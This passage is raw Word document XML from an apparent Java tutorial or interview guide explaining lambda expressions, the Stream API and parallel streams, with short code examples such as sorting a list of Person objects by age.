          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can either be a single expression or a block of code. If it's a single expression, the result is returned automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80EA7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Simple Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF77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a lambda to implement the Runnable interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7515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7CC44C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run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0F3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Runnable interface is a functional interface with a single abstract method run(). The lambda expression () -&gt; System.out.println("Hello, World!") provides the implementation of that method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32561D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Lambda Expression with Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB66E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lambda that takes two integers and adds them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8A5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79D612A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24977AF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lambda expression (a, b) -&gt; a + b implements the BiFunction interface, which takes two parameters and returns a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625478BE"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Lambda with Type Inference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9014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don't need to explicitly declare the types of parameters, as the compiler can infer the types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26B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inferred types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFACA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6C3F268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Lambda"));  // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6838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4: Lambda with Block of Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0B4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ody of the lambda expression has more than one statement, you need to use curly braces {} and explicitly use the return statement if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C3F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multiple statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A756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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B93E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a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496FAC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1F1FFEC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7E31F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4, 5));  // Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FE5D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Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39312E6A"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concise and readable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminates the need for boilerplate code such as anonymous classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE7306"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Allows functions to be passed as arguments or returned from methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F70D7"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use of collections and streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Works seamlessly with the Stream API introduced in Java 8, making it easy to process data in a functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38C2C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Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294D12B"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ssing behavior as parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, passing sorting or filtering logic to methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72290AC0"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collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In combination with the Stream API, lambda expressions simplify operations like filtering, mapping, and reducing collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E676E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions are commonly used in GUI applications to handle events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122AE3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Lambda with Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A826A3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Arrays.asList("Apple", "Banana", "Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831B1F1" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258475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to print all elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65986D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forEach(item -&gt; System.out.println(item));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD77C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0D800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697" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1EBB4"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0" w:name="_Toc197867454"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to use lambda expressions with one example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="6CBE5513" w14:textId="6B7CE57A"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H</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ere’s an example of how to use </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2AF1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 Lambda Expression to Sort a List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993E2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se you have a list of Person objects, and you want to sort them based on their age using a lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964CD2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Define the Person class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EE85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erson {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC370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53BFA8C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7AB9CE2D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4527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16A3A3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1EB8B1D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2E8B8EE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F5E8D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F17CE9" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7951A8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 for name and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA9C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483FD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5431309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225DEE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077A79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091687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561B8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1006D88" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3876F5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6AFCD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616A68E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erson{name='" + name + "', age=" + age + "}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A467C5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1D18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3F135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Use a Lambda Expression to Sort the List by Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5F9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e will use a lambda expression to sort the list of Person objects by age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D457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7A36D7AE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FD2F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200CE8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A4816A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st of Person objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A1FF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Person&gt; people = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA41D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John", 30),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DBF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Alice", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B3F5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Bob", 35)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB6D4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C2159" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3198240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 the list using a lambda expression (sorted by age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB12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sort((p1, p2) -&gt; Integer.compare(p1.getAge(), p2.getAge()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF09C3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5644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sorted list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9740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forEach(person -&gt; System.out.println(person));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679634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9E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E40D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E2C9C2"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47631129"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p1, p2) -&gt; Integer.compare(p1.getAge(), p2.getAge()) is used to define the sorting logic. It compares the ages of two Person objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E962B22"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ort() method of the List interface takes a Comparator. The lambda expression provides the comparator for comparing Person objects based on age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22019E01"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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317605C"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compare(p1.getAge(), p2.getAge()) returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D874A7"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gative value if p1.getAge() is less than p2.getAge().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFEC3A"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ositive value if p1.getAge() is greater than p2.getAge().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49166ACD"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if both ages are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C0C5E"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forEach</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The forEach() method is then used to print the sorted list, where each person object is printed using the toString() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543607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4D7B7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Alice', age=25}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EEBB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John', age=30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6C6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Bob', age=35}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C438E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3C6C3E3"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simplifies the sorting code and eliminates the need for creating an anonymous class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55C57D"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you to define the behavior (comparing by age) directly within the method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148627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xample shows the power of lambda expressions to write concise and readable code, especially when dealing with collections and performing common operations like sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268FB20" w14:textId="062B716D"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698" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="254670A6"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1" w:name="_Toc197867455"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Stream and Parallel stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="4AFBD530" w14:textId="73751706" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8"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in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E7B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Streams can process data in a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way, meaning you describe what you want to do with the data, rather than how it should be done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21209A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Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE6AAF5"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orage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Stream does not store elements. It simply conveys elements from a source (such as a collection) through a pipeline of computational steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E396B0B"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 Nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Operations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazily</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> evaluated (i.e., they are not executed until a terminal operation is invoked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC7084"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Aggregate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations like filtering, mapping, and reducing are all supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D056AF7"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Parallelized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Streams can be processed sequentially or in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E57F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Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16477F79"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return a new Stream and are lazy (e.g., map(), filter(), sorted()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF1FA75"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produce a result or a side-effect (e.g., collect(), forEach(), reduce()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122288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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678BA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08743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02B8149" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400B86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1529BF4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B0C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4038E6C6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FA1BD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Stream to sum the even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530BB04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2762F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even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B125C5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 // Convert Integer to int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D91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  // Sum the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F3F46" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB337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5A51A68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6D9A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9C47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is created from a list, filtered to keep only even numbers, and then the sum of those numbers is computed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB41574"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F70612">
          <v:rect id="_x0000_i1699" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7CA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p w14:paraId="500C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is a special kind of stream in Java that allows operations on the stream to be executed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrently</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using multiple threads. It splits the data into chunks and processes them in parallel, leveraging multi-core processors to speed up computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4C81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parallel streams, you can take advantage of the multi-core architecture of modern CPUs to perform heavy computations more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BF23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Parallel Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58111B"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Parallel streams divide the data into multiple chunks and process them in parallel across multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19950C9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Internally, parallel streams use the common </w:t>
      </w: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for managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610667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Guarantee of Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since parallel operations are performed concurrently, the order of results is not guaranteed unless the terminal operation explicitly ensures it (e.g., collect() with a sorted comparator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E373E11"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There can be overhead for splitting and merging data when using parallel streams, so they may not always be faster than sequential streams, especially for smaller data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854E86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Parallel Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C652D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088F54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135EDF2" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF6384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arallelStreamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8D93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114D3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30CC596D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8F7CA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parallel stream to sum the even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD9B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683F34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filter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1BC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270FFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410A26C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D33E7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4B365A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3E33E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596D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processes the elements in parallel, using multiple threads to compute the sum of even numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAC44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956"/>
        <w:gridCol w:w="3508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="62B9C331" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A8FE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3001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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12ABC5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B422C8" w:rsidRPr="00CE4B95" w14:paraId="3D3BC208" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B82247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1ABCBD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quential (one thread)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B5D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multiple threads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="49FD1954" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="388F767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2C15B1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maller datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED199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larger datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
